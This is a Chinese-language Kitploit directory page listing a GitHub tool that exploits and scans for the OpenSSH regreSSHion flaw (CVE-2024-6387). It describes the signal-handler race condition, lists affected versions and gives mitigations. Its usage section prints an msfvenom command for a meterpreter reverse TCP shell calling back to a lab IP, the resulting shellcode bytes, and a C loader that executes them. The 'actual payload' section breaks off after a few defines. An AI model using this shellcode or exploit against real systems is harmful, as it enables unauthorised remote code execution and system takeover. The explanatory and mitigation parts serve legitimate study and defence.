Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-6387 — 针对 OpenSSH 中 CVE-2024-6387 (regreSSHion) 的利用与扫描工具。包含检测、RCE 利用和 shellcode 生成,适用于授权的渗透测试和实验环境。 | Kitploit
工具/GitHubGitHub/kaleth4/cve-2024-6387
漏洞分析漏洞利用Shellcode渗透测试学习与教育Payload 开发实验室与实践
GitHubkaleth4/cve-2024-6387

CVE-2024-6387

针对 OpenSSH 中 CVE-2024-6387 (regreSSHion) 的利用与扫描工具。包含检测、RCE 利用和 shellcode 生成,适用于授权的渗透测试和实验环境。

查看仓库
15个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
root@kitploit:~
      EXPLOIT CVE-2024-6387

💥 EXPLOIT CVE-2024-6387 (regreSSHion)

用于分析、检测和可控测试 OpenSSH 服务器中 CVE-2024-6387 漏洞的工具。


Bash Python Ethical


⚠️ 法律与道德声明

本仓库仅供教育目的使用。
仅允许在以下环境中使用:

  • 实验室(HTB、TryHackMe)
  • 自有环境
  • 已获明确授权的审计

⚠️ 未经许可扫描或利用系统是非法的。
本内容面向防御与学习。


📑 目录

  • 📖 总体描述
  • 🔍 技术细节
  • 📊 受影响版本
  • ⚙️ 使用
  • 🛠️ 缓解措施
  • 📚 参考资料
  • 👤 作者
  • 📢 免责声明

📖 总体描述

CVE-2024-6387,又称 regreSSHion,是 2006 年已修复漏洞(CVE-2006-5051)的回归。

该漏洞在 OpenSSH 8.5p1(2020) 中被重新引入,并允许:

  • 远程代码执行(RCE)
  • 潜在 root 权限访问
  • 无需认证的攻击
  • 无需用户交互

还有一个相关漏洞:

  • CVE-2024-6409 → 影响特权分离环境中的子进程

🔍 技术细节

该漏洞基于 sshd 信号处理器中的 竞态条件。

🧠 工作原理

  1. 服务器定义 LoginGraceTime(默认:120秒)
  2. 如果客户端未认证:
    • 触发 SIGALRM 信号
  3. 处理器执行非信号安全的函数,例如:
    • syslog()
    • malloc()
    • free()

💣 影响

可能导致:

  • 内存损坏(堆)
  • 任意代码执行

⏱️ 利用难度

  • 大约需要 10,000 次尝试(竞态条件)
  • 在 32 位系统上:
    • 可能需要 6–8 小时
  • 因素:
    • ASLR
    • 网络延迟
    • 系统负载

📊 受影响版本

🛡️ OpenBSD 不易受影响,得益于自 2001 年起实施的额外保护措施。 2 1


⚙️ 使用

python3 exploit.py

🔎 扫描 OpenSSH 服务器

root@kitploit:~
python3 scanner.py <IP> -p 22

```bash

# 生成 shellcode 
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.56.100 LPORT=9999 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of c file: 574 bytes

unsigned char buf[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

自定义载荷

root@kitploit:~
#include <stdio.h>

// A placeholder of your custom payload 
const char shellcode[] =
"\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9"
"\x6a\x22\x41\x5a\x6a\x07\x5a\x0f\x05\x48\x85\xc0\x78\x51"
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01"
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00"
"\x27\x0f\xc0\xa8\x38\x64\x51\x48\x89\xe6\x6a\x10\x5a\x6a"
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74"
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31"
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58"
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0"
"\x78\xed\xff\xe6";

int main() {
    // Execute shellcode
    printf("Executing shellcode...\n");
    void (*sc)() = (void(*)())shellcode;
    sc();

    return 0;
}

实际载荷

root@kitploit:~
#include <stdio.h>
 

#define MAX_PACKET_SIZE (256 * 1024)
#define LOGIN_GRACE_TIME 120
#define MAX_STARTUPS 100
#define CHUNK_ALIGN(s) (((s) + 15) & ~15)


🛠️ 缓解与修复措施 建议紧急执行以下步骤,尤其对暴露于互联网的资产: 立即更新:升级至 OpenSSH 9.8p1 或应用各发行版特定补丁。 sshd 配置:若无法立即更新,请在 /etc/ssh/sshd_config 文件中设置 LoginGraceTime 0。 警告:这样做可防止 RCE,但会使服务器面临连接耗尽导致的拒绝服务(DoS)攻击风险。 访问控制:通过基于网络的防火墙/VPN 控制 SSH 访问,并进行网络分段以防止横向移动。

参考资料

  • https://www.zscaler.com/blogs/security-research/openssh-vulnerabilities-cve-2024-6387-cve-2024-6409-pose-significant
  • https://www.exploit-db.com/exploits/52269
  • https://www.offsec.com/blog/regresshion-exploit-cve-2024-6387/
  • https://github.com/xaitax/CVE-2024-6387_Check

👤 作者

Kaleth Corcho
系统工程 · WolvesTI · 哥伦比亚波哥大

LinkedIn GitHub


📢 免责声明

  • 重要提示:
    • 此工具仅用于授权的渗透测试和红队演练。其设计目的是识别和利用基于 glibc 的 Linux 系统中 OpenSSH 服务器的漏洞。严禁未经授权使用此工具。本工具所有者对任何未经授权的访问或恶意使用不承担责任。
  • 法律声明:
    • 未经相应所有者明确授权,在系统或网络上使用此工具可能违反适用法律法规。用户有责任确保遵守网络安全测试和评估的法律与道德标准。
下载工具
状态版本说明
⚠️ 受影响< 4.4p1若未应用旧补丁
✅ 安全4.4p1 → < 8.5p1先前已修复
⚠️ 受影响8.5p1 → < 9.8p1回归存在
✅ 已修复>= 9.8p1官方补丁